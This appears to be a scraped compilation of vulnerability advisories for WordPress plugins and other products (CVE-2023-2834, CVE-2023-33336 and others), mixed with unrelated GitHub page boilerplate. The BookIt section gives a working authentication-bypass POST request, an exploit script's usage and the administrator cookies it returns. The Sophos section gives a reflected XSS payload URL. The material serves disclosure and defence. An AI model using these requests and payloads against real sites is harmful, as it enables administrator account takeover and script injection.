The SP Project & Document Manager plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.67. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber privileges or above, to change user passwords and potentially take over administrator accounts.

CVE-2023-3063: ajax.php in sp-client-document-manager/trunk/classes – WordPress Plugin Repository

The Web3 – Crypto wallet Login & NFT token gating plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.6.0. This is due to incorrect authentication checking in the 'hidden_form_data' function. This makes it possible for authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

CVE-2023-3249: class-moweb3flowhandler.php in web3-authentication/tags/2.6.0/classes/common/Web3/controller – WordPress Plugin Repository

The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.

The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the website.

**Let’s check the plugin**

The save() method in the AppointmentController class handle the appointment booking with following code:

    $data = CleanHelper::cleanData( $_POST, self::getCleanRules() );
    self::validate( $data );
    
    $customer = CustomerController::get_customer( $data );

It extracts the data from the request, cleans it, and then checks that all required parameters are present during validation.

Then the get_customer( $data ) method in the CustomerController class determines and authenticates the user with following code:

    $settings = SettingsController::get_settings();
    if ( $settings['booking_type'] == 'registered' && ! is_user_logged_in() ) {
    	$data['role']    = User::$customer_role;
    	$data['user_id'] = Customers::save_or_get_wp_user( $data );
    	/** Authorize wp User */
    	wp_clear_auth_cookie();
    	wp_set_current_user( $data['user_id'] );
    	wp_set_auth_cookie( $data['user_id'] );
    }

Then the save_or_get_wp_user( $data ) method in the Customers class determines the user with following code:

    $is_exist_user = get_user_by_email( $data['email'] );
    if ( $is_exist_user ) {
    	return $is_exist_user->data->ID;
    }

As we can see, the user is determined based on the email without authentication.

This means that if the email address is specified in the request, the plugin logs the user in without authentication.

**Let’s see how we can exploit this vulnerability**

We only need to send a POST request to exploit this vulnerability.

The HTTP request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    
    action=bookit_book_appointment&email=info%40lana.codes&password=-&password_confirmation=-&full_name=text&nonce=38039a9e39

We can find the nonce in the bookit_window.nonces.bookit_book_appointment JavaScript object. The nonce JavaScript object is only on the page with the [bookit] shortcode.

**The exploit script**

I created a Python script that which updates the specified user’s email:

Source: stylemixthemes\_bookit\_plugin\_vdb\_get\_exploit\_cookie.py

How to use:

    python3 stylemixthemes_bookit_plugin_vdb_get_exploit_cookie.py --website_url="http://localhost/" --email="[email protected]" --page="/bookit/"

Since the nonce JavaScript object is only on the page with the [bookit] shortcode, so we need to specify the slug for that page.

Run the above command in the Linux terminal.

We get something like this:

    Response Cookies:
    
    Name: wordpress_logged_in_760b44726ec4e18691594516f06e693f
    Value: admin%7C1686892216%7CTqs7dY9527rjySppzvU7pEgaY5AX51QfDJh1TKYxjIo%7Ca31546f1932ff29cf137d07925f398558babdb5558a7e12c4fe9adff69d29466
    Domain: localhost
    Path: /
    Expires: None
    Secure: False
    HttpOnly: False
    
    Name: wordpress_760b44726ec4e18691594516f06e693f
    Value: admin%7C1686892216%7CTqs7dY9527rjySppzvU7pEgaY5AX51QfDJh1TKYxjIo%7C245b328653d77b1d61da29f82018e0adee4f7da0767d334dcf92d28154147c3b
    Domain: localhost
    Path: /wp-admin
    Expires: None
    Secure: False
    HttpOnly: False
    
    Name: wordpress_760b44726ec4e18691594516f06e693f
    Value: admin%7C1686892216%7CTqs7dY9527rjySppzvU7pEgaY5AX51QfDJh1TKYxjIo%7C245b328653d77b1d61da29f82018e0adee4f7da0767d334dcf92d28154147c3b
    Domain: localhost
    Path: /wp-content/plugins
    Expires: None
    Secure: False
    HttpOnly: False

Then all we have to do is set the cookie using the browser’s Developer Tools on the website.

CVE-2023-2834: BookIt by StylemixThemes WordPress plugin Authentication Bypass

File Upload vulnerability in SEMCMS PHP 3.7 allows remote attackers to upload arbitrary files and gain escalated privileges.

CVE-2020-18432

A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.

CVE-2023-36347

Reflected cross site scripting (XSS) vulnerability was discovered in Sophos Web Appliance v4.3.9.1 that allows for arbitrary code to be inputted via the double quotes.

Vendor: Sophos

Product: Sophos Web Appliance

Version affected: 4.1.1-0.9

This worked also on the latest v4.3.9.1 version (as of 05 Jan 2020) I used Firefox Browser, 71.1(64-bit) on Windows 10.

**Product description:**

The Sophos Web Appliance is designed to function as a web proxy that provides HTTP security at. the gateway. Potentially risky content is scanned for various forms of malware.

“Sophos Web Appliance (SWA) and Sophos Management Appliance (SMA) will reach End of Life (EOL) on 20 July 2023. When this happens, the products will continue to pass traffic but will no longer receive security or software updates. Cloud services with functions such as support services and LiveConnect will be turned off.”

*   CVE ID: CVE-2023-33336
*   CWE ID: CWE-79

**Proof of Concept:**

Reflected cross-site scripting (XSS) vulnerability was discovered in the product.

It was possible to inject malicious code and input was successfully reflected between doubles quotes. It’s a systemic XSS, which definitely increases risk compared to standard XSS.

Vulnerable input section was possible to set to: status reports configuration

The following Proof of Concept (PoC) demonstrates the attack as well as displaying evidence of the script payload being returned in the response.

    Sample GET request:
    https://10.0.0.17/index.php?c=trend_suspect&period=0&section=reports" onmouseover%3dprompt(1) bad%3d"&STYLE=34f6ad4ed0b9f19a094041a234feb5e3

Authenticated reflected XSS with the privileges of admin user. Sophos Virtual Web Appliance used to demonstrate the vulnerability was the latest available from Sophos trials website.

**References:**

1.  https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)
2.  https://support.sophos.com/support/s/article/KB-000039441?language=en\_US
3.  https://docs.sophos.com/nsg/swa/help/en-us/nsg/swa/concepts/AboutYourAppliance.html

CVE-2023-33336: Cross-site scripting (XSS) in Sophos Web Appliance - 4.1.1-0.9

Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.0-beta.2.

CVE-2023-3469: huntr – Security Bounties for any GitHub repository

A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-36146: GitHub - leonardobg/CVE-2023-36146

Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.

CVE-2023-36143: GitHub - leonardobg/CVE-2023-36143

requests-xml v0.2.3 was discovered to contain an XML External Entity Injection (XXE) vulnerability which allows attackers to execute arbitrary code via a crafted XML file.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account